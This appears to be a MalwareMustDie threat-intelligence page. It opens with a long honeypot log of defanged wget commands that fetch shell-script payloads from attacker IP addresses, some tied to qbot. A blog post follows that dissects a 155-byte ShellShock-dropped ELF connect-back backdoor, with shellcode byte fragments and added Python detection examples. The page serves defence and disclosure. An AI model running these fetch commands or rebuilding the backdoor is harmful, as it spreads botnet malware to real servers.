2016-01-10 21:46:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 21:11:15 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 21:01:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 20:49:46 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 20:40:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 20:25:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 20:15:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 20:14:43 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 20:05:26 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 19:55:46 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-10 19:51:09 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-10 19:46:55 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 19:23:48 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-10 19:23:10 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 19:23:10 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 19:16:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 19:07:02 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 18:48:58 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 18:47:19 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-10 18:39:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 18:19:05 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 18:09:15 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 17:45:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 17:35:23 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 17:31:07 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 17:24:01 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 17:09:50 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 17:09:50 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 16:42:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 16:32:20 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 15:07:41 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-10 12:18:23 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 07:36:02 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 05:19:50 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-10 05:18:36 | wget -q hxxp:// 208.67.1.165/DOGDICKS/Binarys . sh
2016-01-10 04:43:01 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 03:24:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 03:14:55 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 02:43:30 | wget hxxp:// 218.104.49.211/r3//rd . sh-O /tmp/.lm . sh
2016-01-10 02:34:43 | wget wget hxxp:// 218.104.49.211/r3//rd . sh-O /tmp/.lm . sh
2016-01-10 02:15:50 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-10 02:13:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 02:04:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:48:43 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:39:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:16:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:07:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:42:47 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 00:40:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:31:26 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 00:30:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:15:46 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 00:05:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:05:40 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 00:02:25 | wget hxxp:// 94.102.63.136/bin . sh
2016-01-09 23:56:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 23:20:55 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 22:43:46 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-09 22:26:27 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 22:03:05 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 21:18:34 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:59:54 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:58:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 20:57:46 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:48:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 20:48:28 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:40:57 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:40:57 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:24:46 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:24:36 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:24:36 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:11:20 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 20:08:49 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:07:05 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 20:01:36 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 18:44:50 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 18:35:12 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 18:13:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 18:03:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 17:16:47 | wget ftx://51.254.238.19/gb . sh
2016-01-09 14:22:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 14:12:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 13:25:54 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 13:15:46 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 09:53:33 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 09:42:53 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-09 09:42:51 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-09 09:35:50 | wget hxxp:// 158.69.205.212/getbinaries . sh
2016-01-09 08:27:57 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 07:56:56 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 07:48:27 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 06:20:33 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 05:49:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 05:39:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 05:14:00 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 05:02:32 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:52:29 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:43:25 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 04:40:06 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:30:04 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:07:08 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 04:05:31 | wget hxxp:// 23.89.158.69/gtop . sh

6. Host up-check result (42 hosts are up)

-----------------------------------------------------------------
UpChecked: 70 IP addresses (42 hosts up) scanned in 24.34 seconds
Sun Feb  7 12:37:12 #MalwareMustDie!
-----------------------------------------------------------------

Notes:

Thank you to the friends who contributed so much to this data, and
for the willingness to share it to prevent infections from getting out of control.
God bless us all.

#MalwareMustDie!

Fear thou not; 
for I [am] with thee: be not dismayed; 
for I [am] thy God: I will strengthen thee; 
yea, I will help thee; 
yea, I will uphold thee with the right hand of my righteousness.

☩Isaiah 41:10  

Wednesday, February 3, 2016

MMD-0051-2016 - Debunking a tiny ELF remote backdoor (shellcode shellshock part 2)

The background

In September 2014, while ShellShock exploitation was in full swing, I analyzed a case (MMD-0027-2014) of an ELF payload dropped via a ShellShock attack; the details can be read [here].

Today I found an interesting ELF x86-32 sample that was reported several hours ago. The infection vector is also ShellShock. The reporter did not seem sure whether the ELF binary is malicious or not, nor, if it is malicious, which kind of malware it is. So I decided to dissect it upon receiving the sample, hoping this information will help the security community as a reference for similar cases.

The ELF binary looks like this:

It is a statically compiled 155-byte ELF binary for the Intel 32-bit architecture. From the result of its compilation I can tell that it was shellcode for Linux, compiled from a C template with the GCC compiler.

Studying the sample

As I am fond of shellcode myself as a hobby, looking at the hex and stripping the ELF header parts, I can see that the shellcode inside starts at 31 db f7 e3 53 43 53 6a 02 b0 66 and runs until cd 80 ff e1.

Compared to the previously mentioned case, this shellcode is much shorter. It could be part of something bigger that was cut for whatever purpose, a partial module of the threat series, or it is just small. Anyhow, I decided to check it out, of course with my beloved radare. Once fired up, it shows plain and simple assembly as disassembled below, with each opcode decoding correctly as 80386 (x86-32) machine language:

At a glance, this shellcode looks the same as what we had before, but it is slightly different in several parts and, again, shorter. So now all we have to do is describe how it works.

Dissection of the evil opcodes

I broke the code down into its calls and processes. It took a while and a lot of reading of syscall references, but it was all worth it, and the result is pictured below:

What lines 3 to 25 (xref: 0x08048054 to 0x0804807a) say in plain English is:
First, this ELF/shellcode part creates a socket and sets it up as an internet socket (PF_INET) for a certain IP address and port number (both are hard-coded in hex, see the picture above), on the assumption that a back-connection is going to be made to the remote machine. I see the same procedure used in reverse-shell malware and in some malicious shellcode. This part happens more or less as in the previous case I reported and dissected in September 2014 (linked above).

However, the rest of the lines are the interesting point of this threat.

At 0x0804807c it strictly sets the memory space (in the stack) to the value 7, and this can only mean that the protection flags (PROT_READ, PROT_WRITE, PROT_EXEC) are set to readable, writable and executable (xref: the code from 0x0804807e to 0x0804808d is all about this setting: it calls the syscall sys_mmap2 with a default size of 4096 and the syscall sys_mprotect; in C this is similar to doing a malloc()).

Up to this point the smell of badness is getting stronger. The next code explains its bad activity very well. At 0x0804808f it restores the socket and then reads data from the socket (ref. 0x08048095, which executes syscall 0x03, sys_read) and saves the data to the stack (which is now readable, writable and executable).
The process described so far runs up to 0x08048097 (we are here). So, an explanation in better English of the process up to this point is: this malware connects to the defined IP address and port, listens for what will be sent, and saves the sent data in memory.

Next, the last code, at address 0x08048099, is a jump to the ecx register, which contains the pointer to the data saved in the stack. Yes, this can also mean the execution of whatever data was saved in the allocated stack (memory).

Overall, in short: this backdoor connects back to a hardcoded remote host, listens on the connected socket, retrieves the data sent through it, saves the data in the stack (memory), and can then execute whatever form of executable data is sent to the infected host.
And all of this can be performed by the tiny, savvy little 155-byte ELF file we have. Nasty, isn't it? To be clear, it doesn't fetch any binary and it doesn't contain any shell. As an engineer, one should be precise in defining this malware.
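The connect, map as readable/writable/executable, read and jump sequence described above leaves a recognizable syscall pattern. The following is an added example, not code from the original post: it flags that pattern in syscall trace lines. The trace text is constructed and only strace-like (the read buffer is shown as an address); the IP addresses, ports, memory addresses and function names are assumptions.

```python
import re

CALL = re.compile(r"^(\w+)\((.*)\)\s*=\s*(\S+)")  # one syscall per line: name(args) = ret

def is_wx(prot: str) -> bool:
    """True when a protection string asks for write and execute together."""
    return "PROT_WRITE" in prot and "PROT_EXEC" in prot

def find_push_and_run(trace: str) -> list[str]:
    """Flag reads from a connected socket that land in writable+executable memory."""
    connected, wx_regions, hits = set(), [], []
    for line in trace.splitlines():
        m = CALL.match(line.strip())
        if not m:
            continue
        name, args, ret = m.group(1), m.group(2).split(", "), m.group(3)
        try:
            if name == "connect" and ret == "0":
                connected.add(args[0])
            elif name == "close":
                connected.discard(args[0])
            elif name in ("mmap", "mmap2") and is_wx(args[2]) and ret.startswith("0x"):
                wx_regions.append((int(ret, 16), int(args[1])))
            elif name == "mprotect" and is_wx(args[2]) and ret == "0":
                wx_regions.append((int(args[0], 16), int(args[1])))
            elif name in ("read", "recv") and args[0] in connected:
                buf = int(args[1], 16)
                if any(start <= buf < start + size for start, size in wx_regions):
                    hits.append(f"fd {args[0]}: socket data read into W+X memory at {args[1]}")
        except (IndexError, ValueError):
            continue  # line does not have the argument shape this parser expects
    return hits

# Constructed trace of the sequence described above (documentation IP, made-up port).
SUSPECT = """\
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(12345), sin_addr=inet_addr("192.0.2.10")}, 16) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd9000
read(3, 0xb7fd9000, 4096) = 120
"""
# Constructed benign client: the receive buffer lives in ordinary read/write memory.
BENIGN = """\
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("192.0.2.20")}, 16) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd9000
read(3, 0xb7fd9000, 4096) = 512
"""
if __name__ == "__main__":
    print(find_push_and_run(SUSPECT), find_push_and_run(BENIGN))
```

The correlation keys on the destination buffer, so an ordinary network client that reads into read/write memory is not flagged.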

The implementation of this backdoor can be widely applied as a component of many further forms of badness if it is installed on or sent to any successfully compromised host. We had better pay more attention to these types of small and unusual ELF files inside our systems.
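One way to look for such small and unusual ELF files on disk, as an added example that is not part of the original post: a static triage function that reads only the ELF and program headers. The size threshold, the three heuristics and all names are assumptions, and the 155-byte input is a constructed stand-in with zero filler, not the analysed sample.

```python
import struct

PT_LOAD, PF_X, PF_W = 1, 0x1, 0x2
TINY_LIMIT = 1024  # assumed size threshold in bytes; tune it for your own fleet

def triage_elf(data: bytes) -> list[str]:
    """Return the reasons a file looks like a tiny hand-built ELF ([] = nothing odd)."""
    if len(data) < 16 or data[:4] != b"\x7fELF":
        return []
    is64 = data[4] == 2                    # EI_CLASS: 1 = ELF32, 2 = ELF64
    end = "<" if data[5] == 1 else ">"     # EI_DATA: 1 = little-endian
    try:
        if is64:
            e_phoff, e_shoff = struct.unpack_from(end + "QQ", data, 32)
            phentsize, phnum, _, shnum = struct.unpack_from(end + "4H", data, 54)
        else:
            e_phoff, e_shoff = struct.unpack_from(end + "II", data, 28)
            phentsize, phnum, _, shnum = struct.unpack_from(end + "4H", data, 42)
    except struct.error:
        return ["truncated ELF header"]
    reasons = []
    if len(data) <= TINY_LIMIT:
        reasons.append(f"tiny file ({len(data)} bytes)")
    if e_shoff == 0 or shnum == 0:
        reasons.append("no section header table")
    flags_off = 4 if is64 else 24          # p_flags sits at a different offset per class
    for i in range(phnum):
        base = e_phoff + i * phentsize
        if base + flags_off + 4 > len(data):
            reasons.append("program header table runs past end of file")
            break
        (p_type,) = struct.unpack_from(end + "I", data, base)
        (p_flags,) = struct.unpack_from(end + "I", data, base + flags_off)
        if p_type == PT_LOAD and p_flags & PF_W and p_flags & PF_X:
            reasons.append("PT_LOAD segment is both writable and executable")
    return reasons

def build_sample(size=155, p_flags=7, shnum=0) -> bytes:
    """Constructed ELF32 stand-in (header + one PT_LOAD + zero filler), not the real sample."""
    ident = b"\x7fELF\x01\x01\x01" + b"\0" * 9
    ehdr = struct.pack("<16sHHIIIIIHHHHHH", ident, 2, 3, 1, 0x08048054, 52,
                       84 if shnum else 0, 0, 52, 32, 1, 40, shnum, 0)
    phdr = struct.pack("<8I", PT_LOAD, 0, 0x08048000, 0x08048000, size, size, p_flags, 0x1000)
    return (ehdr + phdr).ljust(size, b"\0")

if __name__ == "__main__":
    for reason in triage_elf(build_sample()):
        print("suspicious:", reason)
```

Each reason on its own also matches some legitimate files, so treat the output as a queue for manual review rather than a verdict.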

The most commonly imaginable follow-up scheme for this ELF infection is the injection of a shell ELF binary (mostly an "sh" or "bash" file, etc.) via this backdoor. But it does not necessarily have to be a shell binary. It can be a rootkit installer or further malicious shellcode.

The threat is already in the wild, folks. Before you yell at me about OPSEC, I'd say awareness is a must too!! There is no need to be hush-hush about this matter, which leaves our fellow sysadmins clueless (like a friend who got this on his server) and without much info about this threat. They are the ones who can lose their jobs for not knowing these details. They need to know the correct definition.

Behavior analysis

During the "run" process, sysadmins on any infected machine will see some operations triggered by the malware in kernel space, as per the calls shown below:

And of course, in this particular file, due to the stupidity of the lamer who copy-pasted and wrongly compiled its code, a segmentation fault will occur for an obvious silly reason, which I will not explain here for security reasons.

Naming of the malware

I must protest to the antivirus products that say this is a "downloader", since clearly there is no direct or indirect downloading code in its binary. The correct fact is that it is a backdoor, with the malicious verdict of: a remote attacker pushes, via TCP, the binary to be executed on the compromised machine through this backdoor.

Other antivirus products named this malware "GetShell"... umm.. well... that is about okay, since "mostly" what will be pushed via this backdoor are shell binaries, but note: this malware is NOT making any GET action to receive that binary, it is just sitting there connecting to an IP and waiting for the push. Moreover, the payload itself doesn't have to be a shell binary either; it could be a rootkit, for example, or some other badness installer, and so on.

For those antivirus products that named this malware "ShellLoader".. sorry, that is just too different in meaning. Firstly, the binary is NOT loading anything except itself, and not a single shell is loaded either. Furthermore, there is a shellloader ELF malware which operates differently from this one, so let's not mix them up. And please, do not suggest a wrong assumption to your market or customers; educate them with real technical facts instead! Come on, you can do better than this!

Congratulations to the ONE product that named this correctly, you did good work! A hat tip!

Sometimes it takes effort to explain what the actual name for this malware is :-)
FYI, this is only 155 bytes of code, and less than that size is shellcode bytes; it shouldn't be that hard to read, especially with good resources, manpower and budget.

I am a field fellow; I work from IDC to IDC, from server to server. Even now my mates are all sysadmins and I am one of them, a NIX admin with 20+ years of experience now, and I know them very well. And UNIX sysadmins CAN NOT AFFORD TO MAKE ANY MISTAKE, and yes, we don't. Services and daemons depend on us. For us, everything related to an incident like this is technical, and we depend on and trust the technical outcome. The name of the malware is the first result we will see, and a sysadmin's actions will be based on that name after the antivirus has scanned it (if they installed one). This is why some of us pay a yearly license fee for antivirus, and they (AV) should not make wrong judgements nor do only pattern-matching checks when naming an ELF malware, especially for this tiny, small, dangerous stuff!!

When I speak the truth, advising the right information and name of this malware and showing some bad namings in the output of virus scanning, what I got was a "WHAT?" from a "younger" friend in an "industry" :-(
Obviously there is no respect for the effort that has been put in here.. :-|
READ THE CODE, bro. Your SERVER SIDE customers in the field are REALLY counting on your skill in naming ELF malware; UNIX servers are not managed like a PC. And again, people like us lose our jobs over hacking incidents like this, while AV may "only" lose some income from a list of customers. So, sorry that I can not be NICE about these silly mistakes.



May ☩ Lord always give strength to those who can read code and reveal the truth as it is.

The sample, epilogue & follow up

The sample is on VirusTotal and can be accessed here --> [link]
I have also added the Shellshock Shellcode compiled malware to its thread on kernelmode [link]

The radare.org [link] dev team has proven that they rock: just by reading this post they added a feature to check the IP address [link] and also added the syscall table information [link] for FreeBSD x86-32, for Linux ELF analysis purposes.
For your information, I have used radare since "radare" was in its 1st version (used it since /usr/ports), and our team has been an "official" (smile) user for so long [link], with thanks, and I keep on using it happily in all my beloved Demon clusters [link]. Please support them with improvement reports!

Thank you for participating in the vote [link] and for the feedback about this post:

NOTE: The follow-up of this case will be posted here. Note that there are a few opcodes that might have a slightly different translation; please bear with any small misses (if any) and kindly inform me about them, but I am sure the overall analysis is correct.

#MalwareMustDie! | analysis by @unixfreaxjp


"Then you will know the truth, and the truth will set you free."

☩John 8:32